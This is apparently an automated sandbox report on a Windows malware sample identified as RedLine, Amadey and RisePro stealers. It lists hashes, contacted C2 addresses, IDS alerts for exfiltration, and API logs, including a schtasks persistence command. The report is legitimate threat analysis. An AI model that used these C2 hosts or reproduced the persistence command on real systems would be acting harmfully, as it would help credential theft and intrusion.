popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

stan.exe

RedLine stealer Client SW User Data Stealer RedlineStealer RedLine Infostealer info stealer Amadey NSIS UltraVNC Themida Generic Malware Hide_EXE browser Google Malicious Library Downloader Chrome User Data UPX Malicious Packer VNC
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Jan. 25, 2024, 8:51 a.m. Jan. 25, 2024, 8:58 a.m.
Size 1.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 04301ab0e3daa0be320a90c29059f088
SHA256 3152c20662edc2b3ece83f56ca9517386693b5420d2ffaf2da46775c59125596
CRC32 9E853CC5
ssdeep 24576:gnbpSUaR+4esvDPmdnwQpyEvOF8txGjU5ZbmNrUVETbpq4:gnbwR+4eiDWlyutxGj0ZSgK1q
Yara
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer
  • PE_Header_Zero - PE File Signature
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • themida_packer - themida packer

Name Response Post-Analysis Lookup
accounts.google.com
A 64.233.188.84
64.233.188.84
apps.identrust.com
A 61.111.58.35
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 61.111.58.34
23.67.53.27
i.alie3ksgaa.com
A 154.92.15.189
154.92.15.189
ipinfo.io
A 34.117.186.192
34.117.186.192
www.google.com
A 142.250.204.36
172.217.161.228
ssl.gstatic.com
A 142.251.220.35
142.250.76.131
db-ip.com
A 104.26.5.15
A 104.26.4.15
A 172.67.75.166
104.26.4.15
IP Address Status Action
104.26.4.15 Active Moloch
109.107.182.3 Active Moloch
117.18.232.200 Active Moloch
141.95.211.148 Active Moloch
142.250.204.36 Active Moloch
142.251.220.35 Active Moloch
154.92.15.189 Active Moloch
164.124.101.2 Active Moloch
185.172.128.19 Active Moloch
185.172.128.90 Active Moloch
185.215.113.68 Active Moloch
193.233.132.62 Active Moloch
195.20.16.103 Active Moloch
34.117.186.192 Active Moloch
5.42.64.33 Active Moloch
61.111.58.35 Active Moloch
64.233.188.84 Active Moloch
80.79.4.61 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.233.132.62:50500 -> 192.168.56.101:49165 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500 2049060 ET MALWARE Suspected RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165 2046267 ET MALWARE [ANY.RUN] RisePro TCP (External IP) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500 2046270 ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500 2046269 ET MALWARE [ANY.RUN] RisePro TCP (Activity) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 64.233.188.84:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49186 -> 142.251.220.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49191 -> 142.250.204.36:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2400020 ET DROP Spamhaus DROP Listed Traffic Inbound group 21 Misc Attack
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49183 -> 64.233.188.84:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49192 -> 142.250.204.36:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 185.215.113.68:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.68:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.101:49177 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.215.113.68:80 -> 192.168.56.101:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.101:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 142.251.220.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.101:49205 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49207 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49207 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 193.233.132.62:50500 2049060 ET MALWARE Suspected RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.101:49212 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2014819 ET INFO Packed Executable Download Misc activity
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.101:49204 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49210 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49210 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49260 -> 185.172.128.19:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49260 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.101:49260 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49260 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49290 -> 185.172.128.90:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49323 -> 141.95.211.148:46011 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 80.79.4.61:18236 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49323 -> 141.95.211.148:46011 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49322 -> 80.79.4.61:18236 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 192.168.56.101:49323 -> 141.95.211.148:46011 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 141.95.211.148:46011 -> 192.168.56.101:49323 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49335 -> 195.20.16.103:20440 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49335 -> 195.20.16.103:20440 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49335 -> 195.20.16.103:20440 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 195.20.16.103:20440 -> 192.168.56.101:49335 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2022491 ET HUNTING Download Request Containing Suspicious Filename - Crypted A Network Trojan was detected
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49298 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49210 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49168
104.26.4.15:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1
192.168.56.101:49184
64.233.188.84:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=accounts.google.com e9:00:f4:02:db:2e:43:07:4d:00:d0:33:77:6d:2b:38:28:c5:a2:b6
TLSv1
192.168.56.101:49186
142.251.220.35:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com 4c:e1:1e:e3:63:49:81:bb:f5:53:ce:44:91:07:8a:14:84:70:7f:66
TLSv1
192.168.56.101:49191
142.250.204.36:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=www.google.com 3a:23:7a:7e:16:ae:ac:26:15:62:07:69:2e:e7:ad:8f:9d:b5:90:b7
TLSv1
192.168.56.101:49183
64.233.188.84:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=accounts.google.com e9:00:f4:02:db:2e:43:07:4d:00:d0:33:77:6d:2b:38:28:c5:a2:b6
TLSv1
192.168.56.101:49192
142.250.204.36:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=www.google.com 3a:23:7a:7e:16:ae:ac:26:15:62:07:69:2e:e7:ad:8f:9d:b5:90:b7
TLSv1
192.168.56.101:49185
142.251.220.35:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com 4c:e1:1e:e3:63:49:81:bb:f5:53:ce:44:91:07:8a:14:84:70:7f:66
TLSv1
192.168.56.101:49212
104.26.4.15:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1
192.168.56.101:49209
104.26.4.15:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1
192.168.56.101:49298
154.92.15.189:443 		C=US, O=Let's Encrypt, CN=R3 CN=i.alie3ksgaa.com e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "explorhe.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Roaming\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: chcp
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Roaming\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: schtasks
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Active code page: 1251
console_handle: 0x00000013
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "MalayamaraUpdate" has successfully been created.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003fb5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003fb5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003fb6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002b7f38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002b7f38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002b7f78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002b7f78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002b8038
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002b8038
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00536328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005367a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00538440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00538440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055f888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055f888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055fa48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055ff48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055ffc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055ffc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0050ede0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0050ede0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0050eca0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfb08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfb08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfb08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfb08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfa88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfa88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfa88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfa88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dfa88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dffc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004dffc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e0708
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0080b3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0080b3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0080b4a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

